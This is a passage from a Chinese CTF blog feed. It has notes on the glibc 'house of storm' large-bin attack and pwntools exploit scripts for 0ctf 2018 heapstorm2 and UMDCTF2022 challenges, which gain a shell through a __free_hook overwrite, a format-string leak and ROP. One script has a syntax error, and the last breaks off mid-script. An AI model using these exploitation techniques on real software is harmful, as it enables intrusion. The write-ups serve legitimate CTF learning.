    <content type="html"><![CDATA[<h1 id="house-of-storm"><a href="#house-of-storm" class="headerlink" title="house of storm"></a>house of storm</h1><h2 id="漏洞危害"><a href="#漏洞危害" class="headerlink" title="漏洞危害"></a>漏洞危害</h2><ul><li>任意地址分配chunk</li></ul><h2 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h2><ol><li>glibc版本小于2.30</li><li><code>unsorted bin</code>要比<code>large bin</code>大，两个chunk需要在归位之后处于同一个 <code>largebin</code> 的index中</li><li><code>unsorted_bin</code> 的 <code>bk</code> 可控</li><li><code>large_bin</code> 的 <code>bk和bk_nextsize</code> 可控</li></ol><h1 id="large-bin-attack"><a href="#large-bin-attack" class="headerlink" title="large bin attack"></a>large bin attack</h1><p>size &gt;=<code>0x400</code>属于<code>large bin</code></p><h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><ul><li>先放入一个<code>large bin</code>，再放入一个<code>unsorted bin</code>，<code>large bin</code>要比<code>unsorted bin</code>小</li><li>修改<code>unsorted bin</code>的bk为<code>target addr</code></li><li>修改<code>large chunk</code>的<code>bk = target addr+8; bk_nextsize = target addr-0x18-5</code>，两个<code>fd</code>不超过一个地址位长度的数据都可以</li><li>再次申请一个chunk就会在target处</li></ul><p>glibc2.23版本相关源码</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// victim为插入large bin的chunk，fwd为large bin中的chunk                      </span></span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">                        &#123;</span><br><span class="line">                          victim-&gt;fd_nextsize = fwd;</span><br><span class="line">                          victim-&gt;bk_nextsize = fwd-&gt;bk_nextsize;</span><br><span class="line">                          fwd-&gt;bk_nextsize = victim;</span><br><span class="line">                          victim-&gt;bk_nextsize-&gt;fd_nextsize = victim;</span><br><span class="line">                        &#125;</span><br><span class="line">                      bck = fwd-&gt;bk;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">              <span class="keyword">else</span></span><br><span class="line">                victim-&gt;fd_nextsize = victim-&gt;bk_nextsize = victim;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">          mark_bin (av, victim_index);</span><br><span class="line">          victim-&gt;bk = bck;</span><br><span class="line">          victim-&gt;fd = fwd;</span><br><span class="line">          fwd-&gt;bk = victim;</span><br><span class="line">          bck-&gt;fd = victim;</span><br></pre></td></tr></table></figure><h1 id="0ctf-2018-heapstorm2"><a href="#0ctf-2018-heapstorm2" class="headerlink" title="0ctf_2018_heapstorm2"></a>0ctf_2018_heapstorm2</h1><h2 id="check"><a href="#check" class="headerlink" title="check"></a>check</h2><p><img src="/article/house%20of%20storm/image-20220324162421740.png" alt="image-20220324162421740"></p><h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><h3 id="init"><a href="#init" class="headerlink" title="init"></a>init</h3><p><img src="/article/house%20of%20storm/image-20220324161747733.png" alt="image-20220324161747733"></p><ol><li>禁用 fastbin</li><li>mmap一个空间作为heaparray</li></ol><h3 id="add"><a href="#add" class="headerlink" title="add"></a>add</h3><p><img src="/article/house%20of%20storm/image-20220324162657734.png" alt="image-20220324162657734"></p><h3 id="edit"><a href="#edit" class="headerlink" title="edit"></a>edit</h3><p><img src="/article/house%20of%20storm/image-20220324162741291.png" alt="image-20220324162741291"></p><ol><li>strcpy造成off by null</li></ol><h3 id="free"><a href="#free" class="headerlink" title="free"></a>free</h3><p><img src="/article/house%20of%20storm/image-20220324162827612.png" alt="image-20220324162827612"></p><h3 id="show"><a href="#show" class="headerlink" title="show"></a>show</h3><p><img src="/article/house%20of%20storm/image-20220324162842195.png" alt="image-20220324162842195"></p><ol><li>需要修改mmap上的数据，否则没有权限</li></ol><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># from LibcSearcher import *</span></span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;0ctf_2018_heapstorm2&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Command: &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size</span>):</span></span><br><span class="line">    cmd(<span class="number">1</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Size: &#x27;</span>,<span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line">    cmd(<span class="number">2</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Index: &#x27;</span>,<span class="built_in">str</span>(index))   </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Size: &#x27;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(content)))  </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Content: &#x27;</span>,content)  </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">3</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Index: &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">4</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Index: &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">fake_chunk = <span class="number">0x13370800</span>-<span class="number">0x20</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x508</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#3</span></span><br><span class="line">add(<span class="number">0x508</span>)<span class="comment">#4</span></span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#5</span></span><br><span class="line">add(<span class="number">0x500</span>)<span class="comment">#6</span></span><br><span class="line"><span class="comment"># UB overlapping</span></span><br><span class="line">edit(<span class="number">1</span>,<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x4f0</span> + p64(<span class="number">0x500</span>))</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">edit(<span class="number">0</span>,<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x18</span>-<span class="number">12</span>))</span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x4d8</span>)<span class="comment">#7 -&gt;50</span></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">add(<span class="number">0x38</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x4e8</span>)<span class="comment">#2</span></span><br><span class="line"><span class="comment"># LB overlapping</span></span><br><span class="line">edit(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x4f0</span> + p64(<span class="number">0x500</span>))</span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line">edit(<span class="number">3</span>,<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x18</span>-<span class="number">12</span>))</span><br><span class="line">add(<span class="number">0x28</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x4c8</span>)<span class="comment">#8 -&gt;5b0</span></span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line">free(<span class="number">5</span>)</span><br><span class="line">add(<span class="number">0x48</span>)<span class="comment">#1</span></span><br><span class="line"><span class="comment"># house of storm</span></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">add(<span class="number">0x4e8</span>)<span class="comment">#2</span></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">edit(<span class="number">7</span>,p64(<span class="number">0</span>)*<span class="number">3</span> + p64(<span class="number">0x4f1</span>) + p64(<span class="number">0</span>)+p64(fake_chunk))<span class="comment">#UB</span></span><br><span class="line">edit(<span class="number">8</span>,p64(<span class="number">0</span>)*<span class="number">3</span>+p64(<span class="number">0x4e1</span>)+p64(<span class="number">0</span>)+p64(fake_chunk+<span class="number">8</span>)+p64(<span class="number">0</span>)+p64(fake_chunk-<span class="number">0x18</span>-<span class="number">5</span>))</span><br><span class="line">add(<span class="number">0x48</span>)</span><br><span class="line"><span class="comment"># leak heap</span></span><br><span class="line">edit(<span class="number">2</span>, p64(<span class="number">0</span>)*<span class="number">6</span> + p64(<span class="number">0x13370800</span>))</span><br><span class="line">payload = p64(<span class="number">0</span>)*<span class="number">3</span> +p64(<span class="number">0x13377331</span>)  </span><br><span class="line">payload += p64(<span class="number">0x13370800</span>) + p64(<span class="number">0x1000</span>) </span><br><span class="line">payload += p64(fake_chunk+<span class="number">3</span>) + p64(<span class="number">8</span>)   <span class="comment">#chunk1</span></span><br><span class="line">edit(<span class="number">0</span>, payload) </span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">heap_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">log.info(<span class="string">&#x27;heap_addr: &#x27;</span> + <span class="built_in">hex</span>(heap_addr))</span><br><span class="line"><span class="comment"># leak libc</span></span><br><span class="line">payload  = p64(<span class="number">0</span>)*<span class="number">3</span> + p64(<span class="number">0x13377331</span>)</span><br><span class="line">payload += p64(<span class="number">0x13370800</span>) + p64(<span class="number">0x1000</span>) <span class="comment">#chunk0</span></span><br><span class="line">payload += p64(heap_addr+<span class="number">0x10</span>) + p64(<span class="number">8</span>) <span class="comment">#chunk1</span></span><br><span class="line">edit(<span class="number">0</span>, payload)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;]: &quot;</span>)</span><br><span class="line">malloc_hook = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>)) -<span class="number">0x58</span> - <span class="number">0x10</span></span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">free_hook = libc_base+libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">system = libc_base+ libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">success(<span class="string">&quot;free_hook:&quot;</span> + <span class="built_in">hex</span>(free_hook))</span><br><span class="line"><span class="comment"># getshell</span></span><br><span class="line">payload  = p64(<span class="number">0</span>)*<span class="number">4</span></span><br><span class="line">payload += p64(free_hook) + p64(<span class="number">0x100</span>)<span class="comment">#chunk0</span></span><br><span class="line">payload += p64(<span class="number">0x13370800</span>+<span class="number">0x40</span>) + p64(<span class="number">8</span>)<span class="comment">#chunk1</span></span><br><span class="line">payload += <span class="string">b&#x27;/bin/sh\x00&#x27;</span></span><br><span class="line">edit(<span class="number">0</span>, payload)</span><br><span class="line">edit(<span class="number">0</span>, p64(system))</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">house of storm</summary>
    
    
    
    <category term="笔记" scheme="https://trick.ink/categories/%E7%AC%94%E8%AE%B0/"/>
    
    
  </entry>
  
  <entry>
    <title>UTCTF2022</title>
    <link href="https://trick.ink/article/UTCTF2022/"/>
    <id>https://trick.ink/article/UTCTF2022/</id>
    <published>2022-03-14T03:33:14.000Z</published>
    <updated>2023-02-09T17:18:30.172Z</updated>
    
    <content type="html"><![CDATA[<h1 id="UTCTF2022"><a href="#UTCTF2022" class="headerlink" title="UTCTF2022"></a>UTCTF2022</h1><blockquote><p>咕咕咕回忆：当时有好几个CTF同时进行，这个只是看了一下然后就没有时间去在比赛时间做题了。</p></blockquote><h1 id="Smol-Overflow"><a href="#Smol-Overflow" class="headerlink" title="Smol Overflow"></a>Smol Overflow</h1><blockquote><p>You can have a little overflow, as a treat</p><p>By Tristan (@trab on discord)</p><p><code>nc pwn.utctf.live 5004</code></p></blockquote><h1 id="Automated-Exploit-Generation-2"><a href="#Automated-Exploit-Generation-2" class="headerlink" title="Automated Exploit Generation 2"></a>Automated Exploit Generation 2</h1><blockquote><p>Now with printf!</p><p>By Tristan (@trab on discord)</p><p>nc pwn.utctf.live 5002</p></blockquote>]]></content>
    
    
    <summary type="html">UTCTF2022</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
  </entry>
  
  <entry>
    <title>XCTF-SUSCTF2022</title>
    <link href="https://trick.ink/article/XCTF-SUSCTF2022/"/>
    <id>https://trick.ink/article/XCTF-SUSCTF2022/</id>
    <published>2022-03-11T06:20:39.000Z</published>
    <updated>2023-02-09T17:18:22.770Z</updated>
    
    <content type="html"><![CDATA[<h1 id="XCTF-SUSCTF2022"><a href="#XCTF-SUSCTF2022" class="headerlink" title="XCTF-SUSCTF2022"></a>XCTF-SUSCTF2022</h1><span id="more"></span><h1 id="happytree"><a href="#happytree" class="headerlink" title="happytree"></a>happytree</h1><p>checksec </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Full RELRO</span><br><span class="line">Stack:    Canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      PIE enabled</span><br></pre></td></tr></table></figure><p>咕咕咕…</p>]]></content>
    
    
    <summary type="html">XCTF-SUSCTF2022</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
  </entry>
  
  <entry>
    <title>UMDCTF2022</title>
    <link href="https://trick.ink/article/UMDCTF2022/"/>
    <id>https://trick.ink/article/UMDCTF2022/</id>
    <published>2022-03-06T10:13:37.000Z</published>
    <updated>2023-02-09T17:18:01.497Z</updated>
    
    <content type="html"><![CDATA[<h1 id="umdctf2022"><a href="#umdctf2022" class="headerlink" title="umdctf2022"></a>umdctf2022</h1><p><a href="https://umdctf.io/">umdctf</a></p><h1 id="Legacy"><a href="#Legacy" class="headerlink" title="Legacy"></a>Legacy</h1><blockquote><p>nc 0.cloud.chals.io 28964</p><p>tag: python2</p></blockquote><h2 id="概要"><a href="#概要" class="headerlink" title="概要"></a>概要</h2><p>python2的input函数漏洞</p><h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>输入字符类型直接报错，利用报错信息发现关键<code>if (input(str(3-i) + &quot; chances left! \n&quot;) == secret):</code>。直接输入<code>secret</code>即可绕过。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># nc 0.cloud.chals.io 28964</span></span><br><span class="line">I bet you can<span class="string">&#x27;t guess my *secret* number!</span></span><br><span class="line"><span class="string">I&#x27;</span>ll give you hint, its between 0 and 0,1000000000000000514!</span><br><span class="line">aaaa</span><br><span class="line">3 chances left! </span><br><span class="line">Traceback (most recent call last):</span><br><span class="line">  File <span class="string">&quot;/home/ctf/legacy.py&quot;</span>, line 15, <span class="keyword">in</span> &lt;module&gt;</span><br><span class="line">    <span class="keyword">if</span> (input(str(3-i) + <span class="string">&quot; chances left! \n&quot;</span>) == secret):</span><br><span class="line">  File <span class="string">&quot;&lt;string&gt;&quot;</span>, line 1, <span class="keyword">in</span> &lt;module&gt;</span><br><span class="line">NameError: name <span class="string">&#x27;aaaa&#x27;</span> is not defined</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># nc 0.cloud.chals.io 28964</span></span><br><span class="line">I bet you can<span class="string">&#x27;t guess my *secret* number!</span></span><br><span class="line"><span class="string">I&#x27;</span>ll give you hint, its between 0 and 0,1000000000000000514!</span><br><span class="line">secret</span><br><span class="line">3 chances left! </span><br><span class="line">No way!</span><br><span class="line">UMDCTF&#123;W3_H8_p7th0n2&#125;</span><br></pre></td></tr></table></figure><h1 id="Classic-Act"><a href="#Classic-Act" class="headerlink" title="Classic Act"></a>Classic Act</h1><blockquote><p>tag: ROP fmt</p></blockquote><h2 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    Canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;classicact&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span></span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">pop_rdi = <span class="number">0x00000000004013a3</span></span><br><span class="line">ret = <span class="number">0x000000000040101a</span></span><br><span class="line">payload = <span class="string">&#x27;%19$paaaa%25$p&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;Please enter your name!&#x27;</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;Hello:\n&#x27;</span>)</span><br><span class="line">canary = <span class="built_in">int</span>(p.recv(<span class="number">18</span>),<span class="number">16</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">libc_main = <span class="built_in">int</span>(p.recv(<span class="number">14</span>),<span class="number">16</span>) - <span class="number">240</span></span><br><span class="line"></span><br><span class="line">libc_base = libc_main - libc.sym[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line">sys = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bin_sh = libc_base + libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>).<span class="built_in">next</span>()</span><br><span class="line">log.success(<span class="string">&#x27;canary: &#x27;</span> + <span class="built_in">hex</span>(canary))</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;Play in UMDCTF!&#x27;</span></span><br><span class="line">payload = payload.ljust(<span class="number">0x48</span>)</span><br><span class="line">payload += p64(canary)*<span class="number">2</span> + p64(pop_rdi) + p64(bin_sh) + p64(sys)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;today?&#x27;</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h1 id="The-Show-Must-Go-On"><a href="#The-Show-Must-Go-On" class="headerlink" title="The Show Must Go On"></a>The Show Must Go On</h1><blockquote><p>We are in the business of entertainment, the show must go on! Hope we can find someone to replace our old act super fast…</p><p><strong>Author</strong>: WittsEnd2</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0.cloud.chals.io 30138</span><br></pre></td></tr></table></figure><p>tag: heap-overflow</p></blockquote><h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><p>一开始发现了向程序输入 <code>showDescription</code> 时有溢出。而且程序给出了一个 <code>win</code> 函数（我一开始还没有发现，因为函数实在太多，没有注意到）。只要把<code>win</code>函数地址覆写到<code>mainAct + 0x60</code>上替换掉<code>tellAJoke</code>函数我们就可以获得flag。而我们需要<code>showDescription = malloc_set(v22 + 8);</code>在申请堆块的时候在<code>mainAct</code>的上方。而<code>message1</code>和<code>message3</code>是在我们申请之前<code>free</code>了。所以我们只需要申请的<code>size</code>和这两个堆块的一样，就可以达到我们的要求。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">*(_QWORD *)(mainAct + <span class="number">0x60</span>) = tellAJoke;</span><br><span class="line">currentAct = mainAct;</span><br><span class="line"><span class="built_in">free</span>(message1);</span><br><span class="line"><span class="built_in">free</span>(message3);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;How long do you want the show description to be?&quot;</span>);</span><br><span class="line">_isoc99_scanf((<span class="keyword">unsigned</span> <span class="keyword">int</span>)<span class="string">&quot;%d&quot;</span>, (<span class="keyword">unsigned</span> <span class="keyword">int</span>)&amp;v22, v17, v18, v19, v20);</span><br><span class="line">showDescription = malloc_set(v22 + <span class="number">8</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;Describe the show for us:&quot;</span>);</span><br><span class="line">getchar();</span><br><span class="line">fgets(showDescription, <span class="number">500LL</span>, <span class="built_in">stdin</span>);</span><br><span class="line">actList = mainAct;</span><br></pre></td></tr></table></figure><h2 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;theshow&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">20002</span>)</span><br><span 